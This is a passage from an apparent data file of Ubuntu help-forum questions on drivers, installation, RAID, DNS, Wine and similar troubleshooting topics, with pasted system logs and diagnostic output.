04:52:15,348 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:15,377 debug : could not instantiate handler subclass _ $ traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/jockey/detection.py '' , line 972 $ desc = inst.name ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 108 , $ self._package_defaults ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 93 , $ ( distro_name , distro_desc ) = oslib.inst.package_description ( self.pa $ file `` /usr/lib/python2.7/dist-packages/jockey/oslib.py '' , line 214 , in $ raise valueerror ( 'package % s does not exist ' % package ) valueerror : package linux-firmware-nonfree does not exist 2013-12-28 04:52:15,378 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:15,388 warning : modinfo for module fglrx_experimental_ $ 2013-12-28 04:52:15,410 debug : could not instantiate handler subclass _ $ traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/jockey/detection.py '' , line 972 $ desc = inst.name ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 108 , $ self._package_defaults ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 93 , $ ( distro_name , distro_desc ) = oslib.inst.package_description ( self.pa $ file `` /usr/lib/python2.7/dist-packages/jockey/oslib.py '' , line 214 , in $ raise valueerror ( 'package % s does not exist ' % package ) valueerror : package fglrx-experimental-12 does not exist 2013-12-28 04:52:15,415 warning : modinfo for module fglrx_updates faile $ 2013-12-28 04:52:15,421 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,421 debug : disabling fglrx driver on live system 2013-12-28 04:52:15,421 debug : ati/amd proprietary fglrx graphics drive $ 2013-12-28 04:52:15,426 warning : modinfo for module fglrx_experimental_ $ 2013-12-28 04:52:15,448 debug : could not instantiate handler subclass _ $ traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/jockey/detection.py '' , line 972 $ desc = inst.name ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 108 , $ self._package_defaults ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 93 , $ ( distro_name , distro_desc ) = oslib.inst.package_description ( self.pa $ file `` /usr/lib/python2.7/dist-packages/jockey/oslib.py '' , line 214 , in $ raise valueerror ( 'package % s does not exist ' % package ) valueerror : package fglrx-experimental-9 does not exist 2013-12-28 04:52:15,453 warning : modinfo for module fglrx failed : error $ 2013-12-28 04:52:15,459 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,459 debug : disabling fglrx driver on live system 2013-12-28 04:52:15,459 debug : ati/amd proprietary fglrx graphics drive $ 2013-12-28 04:52:15,464 warning : modinfo for module fglrx failed : error $ 2013-12-28 04:52:15,470 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,470 debug : disabling fglrx driver on live system 2013-12-28 04:52:15,470 debug : ati/amd proprietary fglrx graphics drive $ 2013-12-28 04:52:15,475 warning : modinfo for module fglrx_experimental_ $ 2013-12-28 04:52:15,497 debug : could not instantiate handler subclass _ $ traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/jockey/detection.py '' , line 972 $ desc = inst.name ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 108 , $ self._package_defaults ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 93 , $ ( distro_name , distro_desc ) = oslib.inst.package_description ( self.pa $ file `` /usr/lib/python2.7/dist-packages/jockey/oslib.py '' , line 214 , in $ raise valueerror ( 'package % s does not exist ' % package ) valueerror : package fglrx-experimental-13 does not exist 2013-12-28 04:52:15,497 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:15,504 warning : modinfo for module ath_pci failed : err $ 2013-12-28 04:52:15,505 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,505 debug : alternate atheros `` madwifi '' driver avail $ 2013-12-28 04:52:15,505 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:15,522 warning : modinfo for module nvidia_304 failed : $ 2013-12-28 04:52:15,528 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,528 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,528 debug : nvidia accelerated graphics driver not a $ 2013-12-28 04:52:15,532 warning : modinfo for module nvidia_304_updates $ 2013-12-28 04:52:15,538 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,538 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,538 debug : nvidia accelerated graphics driver ( post $ 2013-12-28 04:52:15,543 warning : modinfo for module nvidia_current_upda $ 2013-12-28 04:52:15,549 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,549 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,549 debug : nvidia accelerated graphics driver ( post $ 2013-12-28 04:52:15,554 warning : modinfo for module nvidia_experimental $ 2013-12-28 04:52:15,575 debug : could not instantiate handler subclass _ $ traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/jockey/detection.py '' , line 972 $ desc = inst.name ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 108 , $ self._package_defaults ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 93 , $ ( distro_name , distro_desc ) = oslib.inst.package_description ( self.pa $ file `` /usr/lib/python2.7/dist-packages/jockey/oslib.py '' , line 214 , in $ raise valueerror ( 'package % s does not exist ' % package ) valueerror : package nvidia-experimental-304 does not exist 2013-12-28 04:52:15,580 warning : modinfo for module nvidia_current fail $ 2013-12-28 04:52:15,586 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,586 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,586 debug : nvidia accelerated graphics driver not a $ 2013-12-28 04:52:15,591 warning : modinfo for module nvidia_319 failed : $ 2013-12-28 04:52:15,597 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,597 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,597 debug : nvidia accelerated graphics driver not a $ 2013-12-28 04:52:15,602 warning : modinfo for module nvidia_173 failed : $ 2013-12-28 04:52:15,607 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,608 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,608 debug : nvidia accelerated graphics driver not a $ 2013-12-28 04:52:15,612 warning : modinfo for module nvidia_173_updates $ 2013-12-28 04:52:15,618 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,618 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,619 debug : nvidia accelerated graphics driver ( post $ 2013-12-28 04:52:15,623 warning : modinfo for module nvidia_experimental $ 2013-12-28 04:52:15,645 debug : could not instantiate handler subclass _ $ traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/jockey/detection.py '' , line 972 $ desc = inst.name ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 108 , $ self._package_defaults ( ) file `` /usr/lib/python2.7/dist-packages/jockey/handlers.py '' , line 93 , $ ( distro_name , distro_desc ) = oslib.inst.package_description ( self.pa $ file `` /usr/lib/python2.7/dist-packages/jockey/oslib.py '' , line 214 , in $ raise valueerror ( 'package % s does not exist ' % package ) valueerror : package nvidia-experimental-310 does not exist 2013-12-28 04:52:15,651 warning : modinfo for module nvidia_319_updates $ 2013-12-28 04:52:15,657 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,657 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,657 debug : nvidia accelerated graphics driver ( post $ 2013-12-28 04:52:15,662 warning : modinfo for module nvidia_96 failed : e $ 2013-12-28 04:52:15,668 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,668 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,668 debug : nvidia accelerated graphics driver not a $ 2013-12-28 04:52:15,673 warning : modinfo for module nvidia_96_updates f $ 2013-12-28 04:52:15,679 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,679 debug : disabling nvidia driver on live system 2013-12-28 04:52:15,679 debug : nvidia accelerated graphics driver ( post $ 2013-12-28 04:52:15,679 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:15,688 warning : modinfo for module omapdrm_pvr failed : $ 2013-12-28 04:52:15,694 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:15,999 debug : xorgdriverhandler ( omapdrm_pvr , pvr-omap4 $ 2013-12-28 04:52:16,000 debug : powervr sgx proprietary graphics driver $ 2013-12-28 04:52:16,000 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:16,020 debug : instantiated handler subclass __builtin_ $ 2013-12-28 04:52:16,035 debug : software modem not available 2013-12-28 04:52:16,035 debug : loading custom handler /usr/share/jockey $ 2013-12-28 04:52:16,041 warning : modinfo for module vmxnet failed : erro $ and then there are a lot more lines , but i ca n't post them because i exceed the character limit . for some reason though my wifi has n't gone out for almost an hour . i do n't know why this ; all i 've done is remove the bcwml kernel from other guides .
395738	hotspot on kubuntu ( ubuntu 13.10 )	before i begin , i should say do n't mention ad-hoc . ad-hoc is not a `` hotspot '' , as most android devices do n't support ad-hoc connections ( i 've tested many devices ) . for example , i know of connectify for windows but it is n't available for linux and it does n't run with wine . i have an ethernet-connected laptop and want to share its network wirelessly to use on my galaxy s3 .
395739	ubuntu touch on nexus 7 2013	will there be any official support of the nexus 7 2013 model anytime soon ?
395741	wine question please	i am brand new to kubuntu 13.10 and wanted to know exactly now do i install wine on my kubuntu system , please . i am thinking of switching over from windows to linux . i would appreciate a step by step way of doing this so i can use my windows programs on linux . warmest regards . malikius1959
395743	how to install ubuntu on xps 15 platinum - 2014 version properly	just receive a new computer ( dell xps 15 platinum - 2014 version ) . i want to install ubuntu on this one but i 'm not sure everything can work ... here are some feature i 'm afraid it does not work : touchscreen awesome dell pad great battery life ( support of various hardware behaviors ) only one in/out sound plug very high resolution ( 1800p ! ) for now i ca n't test anything : i tried serveral live usb keys but the system never starts . i 'm blocked on the logo with every little circle loaded . things i notice : my computer get hot while i wait at this step i ca n't stop everything just by clicking my shutdown button do you know why i ca n't test ? if ubuntu has a good support of theses things ? thanks !
395749	apache 403 forbidden when following a symlink	i currently have a dual boot between windows and ubuntu 12.04 , using a separate partition to be able to access the same files between the two . so , currently my files are under /media/files my localhost is setup to read from /var/www/ i want to create a symbolic link that points from /var/www/projects/ to /media/files/projects to do this , i ran in /var/www/ : sudo mkdir poll sudo mount -- bind /media/ '' leon 's files '' /projects/poll poll the symlink is being followed correctly , but i think the permissions/owner are wrong and when i try to change them nothing happens . how can i solve this ?
395753	how can i create a deb from binaries ?	i have a few binary files : foo , bar.so , and foo.lnk . i want to make a deb that will extract foo to /usr/share/foo/foo , bar to that same directory , and foo.lnk to /usr/share/applications . i dont want to include any source and there are a few dependencies that i need to make sure are installed . i 've found some resources such as http : //www.webupd8.org/2010/01/how-to-create-deb-package-ubuntu-debian.html and https : //wiki.debian.org/introdebianpackaging . the problem is that they are guides meant to include the source . furthermore , i really dont understand how i specify where to extract certain files to .
395759	multiple casper-rw partitions for liveusb persistence ?	so i have a bunch of small flash drives around 4 gbs or so . 4 gbs is not enough space for me to store all my files in my persistent liveusb . so is it possible to set up multiple casper-rw partitions across multiple flash drives ? so then i could plug in all my flash drives and the live system would detect the individual casper-rw partitions in the multiple flash drives and put them all together to use for space ? i know that you can extend the casper-rw partition but since my flash drive is only 4 gbs , i can not extend it any further . to clarify , i want to know if you can have multiple casper-rw partitions from multiple flash drives and then if the live system can automatically mount all of them and use them all for persistence . is this possible , and if so , how can it be done ? thanks for the help .
395760	installing ubuntu - straight to busybox	i 've tried installing ubuntu on my asus ux51vz , but after some seconds it goes straight to busybox . i also tried with arch and mint , but the same happens . i used different usb-sticks , different ways to create the bootable usb-stick and booted in uefi and without . i 've turned off raid in bios , and have tried using the ide and the achi setting . secure boot is off , csm and oprom enabled . tried the most , but it happens anyway . help is much appreciated . thank you .
395762	unable to login in xubuntu 13.10	i have install xubuntu 13.10 and i installed cinnamon 2.i loged out to test the new cinnamon instalation choosing the session i noticed that there is a session named `` cairo '' ( cairo dock is installed too ) and i tryied to login to see what it is but what i got was a black screen.the system is setup to autologing without asking a pass , so every time i reboot the system boots automaticaly to cairo session , which was the last session i tried to boot , and i allways get a black screen.is there any way to change that ? ? ? ?
395767	has anybody tried ubuntu touch on the moto x ?	when you put ubuntu touch on moto x does it work smooth ? are there any bugs ? and what are the chances it 'll brick my device ?
395770	unity is *always* visible , no matter what app i 'm using	i have used unity for a bit , but i have never encountered this . any full screen ( games , lock screen , etc ) app , the unity sidebar and the top bar are always visible . thankfully , they do n't work . however , working on a netbook using a full-screen app and losing 5 % of your screen is rather annoying . ( for some reason i ca n't post screenshots atm ) is there any way this can be fixed ? i am running 12.04
395771	in 32-bit ubuntu 12.04 , how can i find out if pae has been enabled ?	my os is 32-bit ubuntu 12.04 . i have never intended to install pae . but after recent change of my memory , it can detect 7.8 gb ram . in general , how can i find out if pae has been enabled in ubuntu ? thanks !
395773	i am unable to successfully download anything .	so , i am a person of at least average intelligence , i 'm no stranger to laptops as a whole but this thing is annoying me . first i try to download a decoder for movies , and it tells me to get a zipfile . i try to download a zipfile . it wo n't let me do that either . i let that one go for the moment . but now i try to get my skype on here . nope . says its and error like error 2.8 > 3 or something similar and wo n't let me do it . i know i probably sound inexperienced right now , but this laptop is currently unable to do anything useful .
395774	tablet version of ubuntu that runs on arm a20 processor	i like to download tablet version of ubuntu that runs on arm a20 processor but unable to find it . help please .
395779	what exactly is busybox / ash ?	really , what is busybox and ash ? i have never seen a good explaination to what it is . i 've used it and i know its a linux shell , but i would like to get a real understanding of it .
395782	prevent a partition from overwritten by windows	i have both ubuntu 12.04 and windows 7 on different partitions on my hard drive . there is a ntfs partition accessible to the two oses . under ubuntu 12.04 , how can i make the ntfs partition read-only for windows 7 , to protect it from being overwritten under windows 7 after rebooting into windows 7 ?
395786	how do i fix my read only hard drive ?	i did try dmesg now i't able write for a little bit and then it will go to read only this is it says when i make a folder error while creating directory untitled folder . there was an error creating the directory in /home/steven/desktop . show more details error creating directory : read-only file system and this what happens when i use dmesg [ 306.948404 ] sd 0:0:0:0 : [ sda ] [ 306.948408 ] add . sense : unrecovered read error - auto reallocate failed [ 306.948411 ] sd 0:0:0:0 : [ sda ] cdb : [ 306.948413 ] read ( 10 ) : 28 00 01 a7 e0 00 00 01 00 00 [ 306.948425 ] end_request : i/o error , dev sda , sector 27779072 [ 306.948452 ] sd 0:0:0:0 : [ sda ] unhandled sense code [ 306.948455 ] sd 0:0:0:0 : [ sda ] [ 306.948457 ] result : hostbyte=did_ok driverbyte=driver_sense [ 306.948460 ] sd 0:0:0:0 : [ sda ] [ 306.948462 ] sense key : medium error [ current ] [ descriptor ] [ 306.948466 ] descriptor sense data with sense descriptors ( in hex ) : [ 306.948468 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 306.948480 ] 00 a5 e7 e8 [ 306.948485 ] sd 0:0:0:0 : [ sda ] [ 306.948488 ] add . sense : unrecovered read error - auto reallocate failed [ 306.948491 ] sd 0:0:0:0 : [ sda ] cdb : [ 306.948493 ] read ( 10 ) : 28 00 00 a5 e7 e8 00 00 08 00 [ 306.948503 ] end_request : i/o error , dev sda , sector 10872808 [ 306.948516 ] ata1 : eh complete [ 318.650230 ] ext4-fs ( dm-0 ) : error count : 12 [ 318.650241 ] ext4-fs ( dm-0 ) : initial error at 1388027997 : ext4_find_entry:1309 : inode 11929652 [ 318.650248 ] ext4-fs ( dm-0 ) : last error at 1388075100 : ext4_journal_check_start:56 : inode 11929652 [ 348.647597 ] init : anacron main process ( 1046 ) terminated with status 1 [ 357.072138 ] ext4-fs error ( device dm-0 ) : ext4_remount:4746 : abort forced by user [ 358.271328 ] init : failed to write to log file /var/log/upstart/plexmediaserver.log
395787	can i use wine to run all the windows programs ?	hi i ' am using both windows and linux on a dual boot ! now i see that windows eats up more disk ( c : ) space than linux . so , i was planning to remove windows & before that i would like to know if all the programs which run on windows ( like photoshop ) can be run on my ubuntu13.10 via wine
395790	youtube videos are choppy on chrome after update to 13.10	recently i updated to 13.10 . i mostly use youtube on my phone so i never really noticed but when i tried playing a video on 13.10 with chrome , the video is all choppy , it loads fine and the sound is fine it is just the video starting after after 10 sec then skipping 10 seconds . at first i thought it was my internet acting up but it still happens . this did n't happen back when i was on 13.4. everything says its updated
395792	i want ubuntu for my laptop ? should i use the pc version ?	i am not sure if i should use the pc version . i am downloading it anyway .
395794	what is the simplest command line instruction in ubuntu to export a directory file list to a text file ?	there is a folder consist of some different file types which most of them are font files . i use this simple command to export file names of fonts folder to output text file : ~/fonts $ ls > ../output but i want suchlike command to export the name of all files with additional properties ( name , style , type , size , version , copyright , description and each attribute which displayed in font viewer ) in front of file name with a proper column space like below : file name name style type size , ... freeserif.ttf freeserif medium truetype font 1.5 mb freemono.ttf freemono medium truetype font 343.3 kb and what about fonts directory with some subdirectory ? how to show them like above plus a tree view ? note : the output is not important to be like above . i expect just a simple command which export file properties alongside file name .
395802	mdadm /dev/md2 inactive superblocks	using a wd world book that stopped working after power cycle . i can ssh into the machine and all disks report healthy so if i knew more about linux i think this might be a quick fix . figured i 'd throw this this out to you experts and see what kind of learning experience i can make this into . all data is backed up elsewhere so if we crash and burn i wo n't be mad at anyone , as i said this is more to broaden my mind . i 've included lots of commands i read up on that might clue someone in as to where to go next . and i 'll try anything anyone wants to suggest to get md2 active so that things will work again , ideally without losing any data as pulling from the backup is going to be time consuming because its terabytes over a network . how can i fix this ? / # cat /proc/mdstat personalities : [ linear ] [ raid0 ] [ raid1 ] md2 : inactive sda4 [ 0 ] ( s ) 973524992 blocks super 1.2 md1 : active raid1 sdb2 [ 0 ] sda2 [ 1 ] 256896 blocks [ 2/2 ] [ uu ] md3 : active raid1 sdb3 [ 0 ] sda3 [ 1 ] 987904 blocks [ 2/2 ] [ uu ] md0 : active raid1 sdb1 [ 0 ] sda1 [ 1 ] 1959872 blocks [ 2/2 ] [ uu ] unused devices : < none > / # fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes device boot start end blocks id system /dev/sda1 1 121602 976762583+ ee efi gpt disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes device boot start end blocks id system /dev/sdb1 1 121602 976762583+ ee efi gpt / # smartctl -d ata -a /dev/sda smartctl version 5.38 [ arm-unknown-linux-gnu ] copyright ( c ) 2002-8 bruce allen home page is http : //smartmontools.sourceforge.net/ === start of information section === device model : wdc wd10ears-00mvwb0 serial number : wd-wcaza1917334 firmware version : 51.0ab51 user capacity : 1,000,204,886,016 bytes device is : not in smartctl database [ for details use : -p showall ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : wed dec 25 23:40:03 2013 est smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x84 ) offline data collection activity was suspended by an interrupting command from host . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 23400 ) seconds . offline data collection capabilities : ( 0x7b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 228 ) minutes . conveyance self-test routine recommended polling time : ( 5 ) minutes . sct capabilities : ( 0x3035 ) sct status supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 200 200 051 pre-fail always - 0 3 spin_up_time 0x0027 163 158 021 pre-fail always - 6850 4 start_stop_count 0x0032 083 083 000 old_age always - 17141 5 reallocated_sector_ct 0x0033 200 200 140 pre-fail always - 0 7 seek_error_rate 0x002e 200 200 000 old_age always - 0 9 power_on_hours 0x0032 075 075 000 old_age always - 18619 10 spin_retry_count 0x0032 100 100 000 old_age always - 0 11 calibration_retry_count 0x0032 100 253 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 25 192 power-off_retract_count 0x0032 200 200 000 old_age always - 18 193 load_cycle_count 0x0032 150 150 000 old_age always - 152082 194 temperature_celsius 0x0022 097 084 000 old_age always - 53 196 reallocated_event_count 0x0032 200 200 000 old_age always - 0 197 current_pending_sector 0x0032 200 200 000 old_age always - 0 198 offline_uncorrectable 0x0030 200 200 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 200 multi_zone_error_rate 0x0008 200 200 000 old_age offline - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . / # mdadm -- examine /dev/sda4 /dev/sda4 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : 40af53f3:1c6a19c7 : d62e215c:505e27f1 name : steamboat:2 ( local to host steamboat ) creation time : tue nov 8 17:49:19 2011 raid level : raid0 raid devices : 2 avail dev size : 1947050943 ( 928.43 gib 996.89 gb ) used dev size : 0 data offset : 16 sectors super offset : 8 sectors state : active device uuid : 26970e14 : ff3faf9f:85ae9fae:5354f780 update time : tue dec 24 17:33:46 2013 checksum : 6cbf47da - correct events : 17 chunk size : 512k device role : active device 0 array state : aa ( 'a ' == active , ' . ' == missing ) / #
395803	installing project sputnik again	i 've purchased a dell xps 13 with project sputnik ubuntu 12.04 pre-installed . i downloaded the iso from http : //hwe.ubuntu.com/uds-q/dellxps/ and for my own reasons i want to reinstall it . i made a bootable usb from it but when i boot from the usb it does n't give me the option to install , only to trial ubuntu ( without any prompt for such ) . even then , it does not see my touch pad or wifi in the trial . any help would be appreciated . thanks .
395806	`` error splicing file : input/output error ''	i recently obtained a seagate expansion 3tb external harddrive . i 'm trying to copy over all of my stuff to prepare for reformatting and installing a new os . a handful of my mp3s did not transfer when i was doing my music folder . i checked them after the fact and the original files became corrupted somehow . i am certain of at least a few that were not corrupted in anyway before doing this . every now and then during my transfer i got there was an error copying the file into /media/***/seagate expansion drive . error splicing file : input/output error each of these files that i check after are corrupted at some point in the duration and will not play . why did this happen and what can i do to fix it ?
395807	netflix desktop mouse pointer issue	once i open the netflix-desktop the mouse pointer vanishes and does n't appear even after i close the application . only way i get it back is after i logoff-login . this is the only reason i hesitate to log into ubuntu and have to go into windows . please help if you know solution . i have ubuntu 13.10 . thanks , kk
395810	getting error while trying to install skype in ubuntu 12.04 lts	i am trying to install skype in ubuntu 12.04 and getting this error while doing so e : the package skype : i386 needs to be reinstalled , but i ca n't find an archive for it . i had followed steps provided in these links and this but same thing happens . though i did n't tried with ubuntu software center . i am not able to identify what is causing trouble . how can i fix this ?
395815	problem with extracting tar.gz files	i was downloading something today and when i tried to extract it , a window pop out saying : an error ocurred while extracting files . error setting owner : operation not permitted i 'm running ubuntu 13.10 saucy salamander . what can i do to fix it ?
395819	how do i install ubuntu if the installer ca n't locate the hard drive ?	let me start from the beginning . my windows 7 failed . so i thought it would be good time to install ubuntu . i created a bootable usb drive to make thing easy because the boot sector on my computer is where the problem had originally occurred . i tried getting 13.10 but it was freezing when i would get to the installation screen . my next thought was to try an earlier version . so now i have a bootable usb drive with 12.04 on it . now , when i get to the install screen , it does not detect the hard drive at all . i am running a toshiba satellite l505d . the error message i am receiving is : no root file system is defined . please correct this from the partitioning menu . the problem is , there is nothing to select it from . i am unable to create a new partition , add , change , delete or revert because there is nothing to select in the above menu . what should i do ?
395822	multitap and two-finger scrolling not working on hp-dv51142la	l 'm running kubuntu 13.10 64 bit on a hp dv5-1142la laptop . it 's a synps/2 synaptics touchpad . i just ca n't get two-finger scrolling and multitap to work . i 've tried everything i 've found with no succes . before , i was running ubuntu 13.10 and had the same issue . touchpad works properly , but none multitouch function is working . i know it can work 'cause in both kubuntu and ubuntu 13.04 or earlier versions worked great , even in windows work so i think it 's not a multitouch support problem . system settings shows only one finger support and two finger emulation capable , but even being enabled not work . editing /usr/share/x11/xorg.conf.d/50-multitouch.conf seems to be no effect . this is my synclient -l output : parameter settings : leftedge = 1752 rightedge = 5192 topedge = 1620 bottomedge = 4236 fingerlow = 25 fingerhigh = 30 maxtaptime = 180 maxtapmove = 221 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 75 emulatetwofingerminz = 10 emulatetwofingerminw = 7 vertscrolldelta = 100 horizscrolldelta = 100 vertedgescroll = 1 horizedgescroll = 1 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.98 accelfactor = 0.037 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = 1 lbcornerbutton = 2 tapbutton1 = 3 tapbutton2 = 1 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.100007 circscrolltrigger = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20.37 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 25 verthysteresis = 25 clickpad = 0 thanks for your help .
395825	kubuntu widgets in ubuntu	i 'm using kubuntu , but by default my laptop has ubuntu 13.10 on it . i 'm wondering if i can get the same desktop widgets i have on the kubuntu environment on ubuntu desktop ? everything on it i want exactly that on ubuntu . no screenlets . screenshot :
395829	how to setup telnet to accept remote connections	i am using ubuntu server 13.10 and i am trying to get my telnet to work . i am using a vpn service to test the remote connection . connection : mbmacbook-pro : ~ mb : telnet telnet.mysite.com 666 trying ip ... telnet : connect to address ip : operation timed out telnet : unable to connect to remote host but when i try it on my local network , it works . how can i get the telnet service to work for remote connections ?
395832	screwed up dns settings in 13.10	when i run nslookup internal.foo.com i get server : 127.0.1.1 address : 127.0.1.1 # 53 ** server ca n't find internal.foo.com : nxdomain for some reason , i am not getting the 172.17.51.3 internal dns server i added . how do i fix this ( via command-line if possible ) ? /etc/resolv.conf nameserver 127.0.1.1 search foo.com /etc/networkmanager/system-connections/ethernet\ connection\ 1 [ 802-3-ethernet ] duplex=full [ connection ] id=ethernet connection 1 uuid=4ccfdffe-b3e5-4fb2-906f-28a3e1c7a71b type=802-3-ethernet timestamp=1387729723 [ ipv6 ] method=auto [ ipv4 ] method=manual dns=172.17.51.3 ; 8.8.8.8 ; dns-search=foo.com ; address1=172.17.51.9/24,172.17.51.1 solution i do n't know why networkmanager seems to be misbehaving , but following the instructions from here seems to work . essentially , you appear to have to do something like this : echo `` nameserver 172.17.51.3 nameserver 8.8.8.8 search foo.com '' | sudo resolvconf -a eth0.inet
395836	gcompris administration error `` could n't find the board menu.. ''	when i try to launch `` gcompris administration '' i only get this error : could n't find the board menu / , or plugin execution error what it means ? how to make it working ? i installed it by package manager ( synaptic ) , from universe repository . i installed packages : gcompris , gcompris-data , gcompris-sound-en , gcompris-sound-it . packages version is 12.11-1 . i 'm using ubuntu 13.10 , 64-bit .
395840	start installing packages while further fetching the update	is there a package manager that during installation/update will already start installing first fetched packages whlie other packages are still being downloaded ? example made up scenario : chromium depends on libwebkit . normally when a user runs apt-get install chromium apt will fetch the small in size libwebkit.deb library and then still wait for chromium.deb to be fetched . this is simply a waste of time especially during big system updates . instead this scenario is much more reasonable : apt-get install apt-get downloads libwebkit.deb and as soon as libwebkit.deb is downloaded it proceeds with installing it without waiting for chromium.deb to be fully fetched , chromium.deb at the same time is being fetched in the background . once chromium.deb has finished downloading apt-get can proceed with its installation immediately without waiting for libwebkit to install as libwebkit was already installed during the fetching of chromium.deb
395842	error on reverting back to previous xorg configuration	i have a computer with two graphics cards : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) i have tried to install the nvidia driver on my computer , but it does n't work . so , i have decided to come back to my precedent configuration ( with the intel graphics card ) , but it does n't work either , i 'm blocked on the choosing session screen . it seems to be related to xorg because when i do the command startx , i get : loading extension glx xinit : connection to x server lost with the logs : [ 49.489 ] x.org x server 1.14.3 release date : 2013-09-12 [ 49.489 ] x protocol version 11 , revision 0 [ 49.489 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 49.489 ] current operating system : linux pc-clement 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 [ 49.489 ] kernel command line : boot_image=/boot/vmlinuz-3.11.0-14-generic.efi.signed root=uuid=bad168bf-734e-4414-82d6-3a86ecb69e40 ro quiet splash vt.handoff=7 [ 49.489 ] build date : 15 october 2013 09:23:37am [ 49.489 ] xorg-server 2:1.14.3-3ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 49.489 ] current version of pixman : 0.30.2 [ 49.489 ] before reporting problems , check http : 